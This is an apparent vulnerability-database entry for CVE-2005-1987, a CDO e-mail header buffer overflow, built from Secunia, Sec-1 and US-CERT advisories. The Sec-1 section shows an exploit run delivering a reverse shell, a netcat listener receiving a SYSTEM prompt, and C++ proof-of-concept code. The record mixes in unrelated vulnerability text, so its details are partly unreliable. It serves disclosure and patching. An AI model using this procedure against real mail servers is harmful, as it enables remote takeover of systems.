ID

VAR-200510-0005

CVE

CVE-2005-1987

TITLE

Microsoft Internet Explorer can use any COM object

DESCRIPTION

Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library. The vulnerability has been reported in the following versions: * Windows 2000 (remote code execution) * Windows XP Service Pack 1 (remote code execution) * Windows XP Service Pack 2 (local privilege escalation) * Windows Server 2003 (local privilege escalation) * Windows Server 2003 Service Pack 1 (local privilege escalation) 3) An error in the MSDTC when validating TIP (Transaction Internet Protocol) requests can be exploited to cause the service to stop responding via a specially crafted network message. The malicious TIP message can be transferred through the affected system to another, which causes the MSDTC on both systems to stop responding. Successful exploitation requires that the TIP protocol is enabled for MSDTC. SOLUTION: Apply patches. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . SEC-1 LTD. The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable. The vulnerability can be exploited by crafting an e-mail with a large header name such as "Content-Type<LARGE STRING>:". A failure to correctly determine the length of the string results in a stack overflow. Under certain conditions the vulnerability can also be used to bypass content security mechanisms such as virus and content security scanners. Proof of concept code to recreate the problem is included at the bottom of this advisory. Exploit Availability: Sec-1 do not release exploit code to the general public. Attendees of the Sec-1 Applied Hacking & Intrusion prevention course will receive a copy of this exploit as part of the Sec-1 Exploit Arsenal. See: http://www.sec-1.com/applied_hacking_course.html Exploit Example: [root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53 Enter IP address of your attacking host: 10.0.0.200 Enter Port for shellcode to connect back on: 80 [*]----Connected OK! [*]----Sending MAIL FROM: me@test.com [*]----Sending RCPT TO: <me@test.com> [*]----Sending Malformed E-mail body [*]----Shellcode Length: 316 [*]----Shellcode type: Reverse shell [*]----Done. [!] Note this may take a while. Inetinfo will crash and restart This will happen until a nops are reached. You may also want to clear the queue to restore Inetinfo.exe by deleting malformed e-mail from c:\Inetpub\mailroot\Queue [root@homer PoC]# nc -l -p 80 -v listening on [any] 80 ... 10.0.0.53: inverse host lookup failed: Unknown host connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>c:\whoami NT AUTHORITY\SYSTEM C:\WINNT\system32> Vendor Response: Microsoft have released the following information including a fix, http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CAN-2005-1987 Demonstration: The following CDO code demonstrates the problem. Step 1. Create an E-mail named vuln.eml including a large "Content-Type:" header. Step 2. // Compile with -GX option #import <msado15.dll> no_namespace rename("EOF", "adoEOF") #import <cdosys.dll> rename_namespace("CDO") #include <stdio.h> int main() { CoInitialize(0); try { CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); _StreamPtr spStream(spMsg->GetStream()); spStream->Position = 0; spStream->Type = adTypeBinary; spStream->LoadFromFile("vuln.eml"); spStream->Flush(); for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) { CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; } } catch(_com_error &e) { printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description()); } catch(...) { printf("General exception\n"); } CoUninitialize(); return 0; } CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; Copyright 2005 Sec-1 LTD. All rights reserved. ************************************************************** NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html ************************************************************** . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Technical Cyber Security Alert TA05-284A Microsoft Windows, Internet Explorer, and Exchange Server Vulnerabilities Original release date: October 11, 2005 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Internet Explorer * Microsoft Exchange Server For more complete information, refer to the Microsoft Security Bulletin Summary for October 2005. Overview Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server. I. Description Microsoft Security Bulletins for October 2005 address vulnerabilities in Windows and Internet Explorer. Further information is available in the following US-CERT Vulnerability Notes: VU#214572 - Microsoft Plug and Play fails to properly validate user supplied data Microsoft Plug and Play contains a flaw in the handling of message buffers that may result in local or remote arbitrary code execution or denial-of-service conditions. (CAN-2005-1987) VU#922708 - Microsoft Windows Shell fails to handle shortcut files properly Microsoft Windows Shell does not properly handle some shortcut files and may permit arbitrary code execution when a specially-crafted file is opened. (CAN-2005-0163) II. An attacker may also be able to cause a denial of service. III. Solution Apply Updates Microsoft has provided the updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site. Workarounds Please see the following US-CERT Vulnerability Notes for workarounds. Appendix A. References * Microsoft Security Bulletin Summary for October 2005 - <http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx> * US-CERT Vulnerability Note VU#214572 - <http://www.kb.cert.org/vuls/id/214572> * US-CERT Vulnerability Note VU#883460 - <http://www.kb.cert.org/vuls/id/883460> * US-CERT Vulnerability Note VU#922708 - <http://www.kb.cert.org/vuls/id/922708> * US-CERT Vulnerability Note VU#995220 - <http://www.kb.cert.org/vuls/id/995220> * US-CERT Vulnerability Note VU#180868 - <http://www.kb.cert.org/vuls/id/180868> * US-CERT Vulnerability Note VU#950516 - <http://www.kb.cert.org/vuls/id/950516> * US-CERT Vulnerability Note VU#959049 - <http://www.kb.cert.org/vuls/id/959049> * US-CERT Vulnerability Note VU#680526 - <http://www.kb.cert.org/vuls/id/680526> * CAN-2005-2120 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120> * CAN-2005-1987 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987> * CAN-2005-2122 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122> * CAN-2005-2128 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128> * CAN-2005-2119 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119> * CAN-2005-1978 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978> * CAN-2005-2127 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127> * CAN-2005-0163 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163> * Microsoft Update - <https://update.microsoft.com/microsoftupdate> _________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA05-284A.html> _________________________________________________________________ Feedback can be directed to US-CERT. Please send email to: <cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject. _________________________________________________________________ Revision History Oct 11, 2004: Initial release _________________________________________________________________ Produced 2005 by US-CERT, a government organization. Terms of use <http://www.us-cert.gov/legal.html> _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/>. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c 1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe /9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog== =5hXu -----END PGP SIGNATURE-----

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

buffer error

CONFIGURATIONS

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Gary O'leary-Steele garyo@sec-1.com

SOURCES

LAST UPDATE DATE

2024-09-19T22:08:33.446000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE